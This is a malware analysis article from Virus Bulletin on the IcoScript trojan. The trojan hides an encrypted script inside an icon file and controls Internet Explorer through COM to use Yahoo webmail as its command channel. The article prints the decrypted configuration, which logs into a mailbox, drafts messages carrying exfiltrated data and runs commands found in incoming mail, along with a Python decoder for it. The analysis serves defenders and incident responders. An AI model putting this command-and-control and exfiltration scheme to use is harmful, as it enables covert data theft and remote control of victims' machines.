IcoScript: using webmail to control malware

2014-08-05

Paul Rascagnères

G Data, Germany
Editor: Martijn Grooten

Abstract

Win32.Trojan.IcoScript.A is a classic remote administration tool, but it has a particular way of communicating with its control server. It is very modular and it abuses popular web platforms (such as Yahoo and Gmail) for command and control communication. Paul Rascagneres discusses the unusual techniques used by the trojan.


Recently, we identified a piece of malware that had gone undetected since 2012. We named the malware Win32.Trojan.IcoScript.A. This sample is a classic remote administration tool (RAT) but it has a particular way of communicating with its control server. It is very modular and it abuses popular web platforms (like Yahoo and Gmail) for command and control communication. This article presents the techniques used by this malware. In addition, we can envisage future techniques that will make the lives of incident response teams harder.

Hidden COM-munication

Component Object Model technology (COM)

Microsoft Windows provides an interface for inter process communication. It allows developers to control the objects of other applications. This technology, called COM, can be used to control Internet Explorer. It’s very useful for malware developers because it allows them to manipulate the browser that is being used by a legitimate user. The advantages are as follows:

  • The HTTP communication is performed by the user’s iexplore.exe process (not by the malware itself).

  • If the targeted infrastructure uses a proxy (with authentication), the malware can reuse the proxy token stored in the user session. (The malware developers don’t have to worry about the proxy configuration on the infected machine.)

  • Analysis by reverse engineering is more complicated – there’s no obvious evidence of malicious network behaviour or socket usage etc.

  • The user does not usually notice the additional communication being carried out by the browser – the session is hidden.

Listing 1 shows an example of harmless COM usage to get the content of a web page.

if (SUCCEEDED(OleInitialize(NULL)))
{
  IWebBrowser2*  pBrowser2;
  HRESULT hr;
  IDispatch* pHtmlDoc = NULL;
  CoCreateInstance(CLSID_InternetExplorer, NULL, CLSCTX_LOCAL_SERVER, 
      IID_IWebBrowser2, (void**)&pBrowser2);
  if (pBrowser2)
  {
    VARIANT vEmpty;
    VariantInit(&vEmpty);
    BSTR bstrURL = SysAllocString(L”http://www.gdata.de”);

    HRESULT hr = pBrowser2->Navigate(bstrURL, &vEmpty, &vEmpty, &vEmpty, &vEmpty);
    if (SUCCEEDED(hr))
    {
      hr = pBrowser2->get_Document(&pHtmlDoc);
    }
    else
    {
      pBrowser2->Quit();
    }
    SysFreeString(bstrURL);
    pBrowser2->Release();
  }
  OleUninitialize();
}

Listing 1: Harmless COM usage.

If we go back to our sample and look at it from an analyst’s point of view, the malware uses two specific and interesting functions: CoInitialize() (which is called by OleInitialize() in the example shown in Listing 1) and CoCreateInstance(). The first is used to initialize the COM library on the current thread. The second function is used to create an object of the class associated with a specified CLSID. As can be seen in Listing 1, the CLSID is the first argument and represents the object to manipulate (in our case Internet Explorer). Figure 1 shows an IDA screenshot of this function in our sample.

Use of CoCreateInstance().

Figure 1. Use of CoCreateInstance().

Figure 2 shows the first argument (the CLSID).

CLSID value.

Figure 2. CLSID value.

The value is: 0002DF01-0000-0000-C000-000000000046. We can find what is behind this ID in the Windows registry: HKEY_CLASSES_ROOT\CLSID (see Figure 3).

CLSID correspondence.

Figure 3. CLSID correspondence.

The registry value confirms that our sample creates an instance of Internet Explorer. Thanks to this information, we know that the malware manipulates Internet Explorer.

Words don't come easy

To optimize the manipulation of the browser and achieve a modular communication channel, the malware developers created a kind of scripting language. The script is encrypted and concealed in an additional file, used as a configuration file. This is appended to a legitimate ‘.ico’ (icon) file (containing an Adobe Reader logo).

We can find the routine used to decrypt the data in the sample, Figure 4 shows a screenshot of the routine.

Function used to decode the .ico configuration file.

Figure 4. Function used to decode the .ico configuration file.

We created a Python script to decrypt the data, as shown in Listing 2.

def decode(strg):
  strg = strg.replace(‘0’, ‘@’)
  strg = strg.replace(‘1’, ‘\\’)
  if len(strg) < 3:
    return strg
  c = 0
  final = “”
  while c < len(strg):
    final = final + chr(((ord(strg[c+1])>>4)&3)|(ord(strg[c])<<2) & 0xff)
    final = final + chr(((ord(strg[c+2])>>2)&0xf)|(ord(strg[c+1])<<4) & 0xff)
    final = final + chr((ord(strg[c+3])&0x3f)|(ord(strg[c+2])<<6) & 0xff)
    c = c+4
 return re.sub(“\)$”, “”, final.replace(“\n”, “”))

Listing 2: Python script to decode the data.

The following is the decrypted script included in the sample 378c0eacf2cc0c2b918ffe567f997e66:

[COMMON]
RUN=2
TS1=8
TS2=10
TO=5
TD=15
TW=25
TE=7
[-1-]

A_1_T=URL
A_1_Att_V=http://mail.yahoo.com

B_1_T=INPUT
B_1_Att_M=id
B_1_Att_V=username
B_1_V=ku...n3@yahoo.com

B_2_T=INPUT
B_2_Att_M=id
B_2_Att_V=passwd
B_2_V=3ed...$

B_3_T=CHECK
B_3_Att_M=id
B_3_Att_V=persistent
B_3_V=0

B_4_T=BUTTON
B_4_Att_M=id
B_4_Att_V=.save
B_N=P
B_E=O

O_1_T=BODY
O_1_Att_M=text
O_1_Att_V= ku...n3
O_1_V=MY
O_N=C
O_E=Z

P_1_T=INPUT
P_1_Att_M=id
P_1_Att_V=username
P_1_V=p
P_N=B
P_E=Q

Q_1_T=INPUT
Q_1_Att_M=id
Q_1_Att_V=passwd
Q_1_V=3ed...$

Q_2_T=BUTTON
Q_2_Att_M=id
Q_2_Att_V=.save
Q_N=R
Q_E=R

R_1_T=A
R_1_Att_M=id
R_1_Att_V=skip
R_N=S
R_E=S

S_1_T=INPUT
S_1_Att_M=id
S_1_Att_V=.norepl
S_N=T
S_E=T

T_1_T=A
T_1_Att_M=id
T_1_Att_V=skip
T_N=C
T_E=C

C_1_T=A
C_1_Att_M=href
C_1_Att_V=showFolder?fid=Inbox
C_1_P_Tag=LI
C_1_P_P_Tag=UL
C_E=X

D_1_T=A
D_1_Att_M=text
D_1_Att_V=GUID
D_N=C
D_E=E

E_1_T=FDF
E_1_V=S

F_1_T=FORM
F_1_Att_M=action
F_1_Att_V=compose?

G_1_T=TEXTAREA
G_1_Att_M=id
G_1_Att_V=to
G_1_V= ku...n3@yahoo.com

G_2_T=TEXTAREA
G_2_Att_M=id
G_2_Att_V=compose_editorArea
G_2_V=BLOCK

G_3_T=INPUT
G_3_Att_M=id
G_3_Att_V=Subj
G_3_V=TITLE

G_4_T=INPUT
G_4_Att_M=id
G_4_Att_V=save_bottom
G_N=E

X_1_T=A
X_1_Att_M=href
X_1_Att_V=logout
X_N=Z

The scripting language used in the sample is a step-by-step action. Each step is defined by a variable and a value for it – for example, in the step A_1_T=URL, A_1_T is the variable and URL is the value.

The variable is divided into two or three parts split by ‘_’. The first part is the step ID. The following is a list of the supported actions and variables:

  • A: use IE to go to a specific link on a website

  • BLOCK: a variable that contains the data to exfiltrate

  • BODY: control an element in a web page

  • BUTTON: use IE to press a specific button on a web page

  • CHECK: use IE to check/uncheck a checkbox on a web page

  • E: specify the step ID on failure

  • EXC: execute a file

  • GUID: a variable that contains the malware instance ID

  • FDF: control whether outgoing messages are present

  • HIDDEN: use IE to get the content of a ‘HIDDEN’ element on a web page

  • IFRAME: use IE to get the content of an ‘IFRAME’ on a web page

  • INPUT: use IE to fill in a form on a web page (INPUT type)

  • N: specify the step ID on success

  • TEXTAREA: use IE to fill in a form on a web page (TEXTAREA type)

  • TITLE: a variable that contains the title of the outgoing message

  • URL: use IE to connect to a specific URL.

Table 1 shows the interpretation of the example decrypt above.

StepCommandDescription
Step AURL: http://mail.yahoo.comUse COM to connect IE to http://mail.yahoo.com
Step B-1INPUT: id:username:ku...n3@yahoo.comUse COM to fill the username field with k...n3@yahoo.com
Step B-2INPUT: id:passwd:3ed...$Use COM to fill the password field with 3ed...$
Step B-3CHECK: id:persistent:0Use COM to check the checkbox called ‘persistent’
Step B-4BUTTON: id:.saveUse COM to click on the .save button
Step B-NN: PIf step B is a success, go to step P
Step B-EE: OIf step B is a failure, go to step O
Step O-1BODY: text:ku...n3:MYUse COM to check if an element called ‘ku...n3’ contains MY
Step O-NN: CIf step O is a success, go to step C
Step O-EE: ZIf step O is a failure, go to step Z
Step P-1INPUT: id:username:pUse COM to fill the username field with p
Step P-NN: BIf step O is a success, go to step B
Step P-EE: QIf step O is a failure, go to step Q
Step Q-1INPUT: id:passwd:3ed....$Use COM to fill the password field with 3ed...$
Step Q-2BUTTON: id:.saveUse COM to click on the .save button
Step Q-NN: RIf step Q is a success, go to step R
Step Q-EE: RIf step Q is a failure, go to step R
Step R-1A: id:skipClick on the link with the id skip
Step R-NN: SIf step R is a success, go to step S
Step R-EE: SIf step R is a failure, go to step S
Step S-1INPUT: id:.noreplUse COM to fill the form .norepl
Step S-NN: TIf step S is a success, go to step T
Step S-EE: TIf step S is a failure, go to step T
Step T-1A id:skipClick on the link with the id skip
Step T-NN: CIf step T is a success, go to step C
Step T-EE: CIf step T is a failure, go to step C
Step C-1A: href:showFolder?fid=Inbox:LI:ULGo to the href: showFolder?fid=Inbox
Step C-EE: XIf step E is a failure, go to step X
Step D-1A: text:GUIDClick on the link with the text GUID
Step D-NN: CIf step D is a success, go to step C
Step D-EE: EIf step D is a failure, go to step E
Step E-1FDF: S:FORM:action:=compose?Check if an email is available in the mailbox
Step G-1TEXTAREA: id:to:ku...n3@yahoo.comUse COM to fill the TEXTAREA called ‘to’ with ku...n3@yahoo.com
Step G-2TEXTAREA: id:compose_editorArea:BLOCKUse COM to fill the TEXTAREA called ‘compose_editorArea’ with the data to exfiltrate
Step G-3INPUT: id:Subj:TITLEUse COM to fill the Subj form
Step G-4INPUT: id:save_bottomUse COM to save the message
Step G-NN: EIf step G is a failure, go to step E
Step X-1A: href:logoutGo to the href: logout
Step X-NN: ZIf step X is a failure, go to step Z

Table 1. Interpretation of example decrypt.

The step G is a crucial one. In addition to exfiltrating data, the malware checks available email in the mailbox (thanks to step E) and looks for the string pattern <<<<<<<< … >>>>>>>>. If the string is found, the data between it is executed. We also identified some variants that use ++++++++ and ####### to delimit the data to execute.

Message in a haystack

This approach is very interesting for several reasons:

  • It is modular: in the sample we looked at, the malware uses Yahoo email, but it would be easy to switch to another webmail such as Gmail. We imagine that the author(s) can also use social media platforms such as Facebook and LinkedIn.

  • The use of popular webmail services prevents companies from blacklisting and containing the traffic.

  • Intrusion detection systems (IDS) fall short of detecting the strings <<<<<<< and >>>>>> and +++++++ and ######, because the network flow of Yahoo webmail is compressed with gzip. The data is only uncompressed in the user’s browser, so the IDS would have to uncompress on the fly. Furthermore, the string can use HTML obfuscation tricks, as we know from spam (for example by mixing &gt; and >).

  • The attackers can use hundreds of different email accounts with names that are very similar to those of real users. It is very difficult to distinguish fake accounts from real ones.

As we can see, this kind of communication can be hard for incident response teams to detect during the containment phase.

Conclusion

The technique used by this remote administration tool is clever, because it is modular, easy to adapt and the flow of traffic is overlooked among the large number of legitimate web requests. Malware developers constantly work to improve the communication between the infected machines and the command and control servers. For incident response teams, containment is usually restricted to blocking the URL on the proxy. In this case, the URL cannot easily be blocked and a lot of legitimate requests must not be blocked. Furthermore, the attacker can configure each sample to use multiple legitimate websites such as social networks, webmail sites, cloud services and so on. The containment must be performed on the network flow in real time. This approach is harder to realize and to maintain. It demonstrates both that attackers know how incident response teams work, and that they can adapt their communication to make detection and containment both complicated and expensive.

twitter.png
fb.png
linkedin.png
hackernews.png
reddit.png

 

Latest articles:

VB2019 paper: Operation Soft Cell – a worldwide campaign against telecommunication providers

In this paper researchers from Cybereason look at Operation Soft Cell – a worldwide campaign against telecommunication providers.

VB2019 paper: A study of Machete cyber espionage operations in Latin America

Reports on cyber espionage operations have been on the rise in the last decade. However, operations in Latin America are heavily under-researched and potentially underestimated. This paper analyses and dissects a cyber espionage tool known as…

VB2019 paper: The push from fiction for increased surveillance, and its impact on privacy

Privacy is a major source of concern for people living in the digital age. Whether they are right in their suspicions or not, people have even started questioning whether their smart light bulbs are spying on them. The only certainty we have in all…

VB2019 paper: Oops! It happened again!

This paper will take you on a scenic tour spanning three decades of malware, three decades of digital ecosystems and three decades of history repeating itself. When will we ever learn?

VB2019 paper: A vine climbing over the Great Firewall: a long‑term attack against China

This paper discloses details of a little-known APT group, PoisonVine, and its long history of cyberespionage activities lasting 11 years. The group is keen on Chinese entities and aims to harvest political and military intelligence. The paper…


Bulletin Archive

We have placed cookies on your device in order to improve the functionality of this site, as outlined in our cookies policy. However, you may delete and block all cookies from this site and your use of the site will be unaffected. By continuing to browse this site, you are agreeing to Virus Bulletin's use of data as outlined in our privacy policy.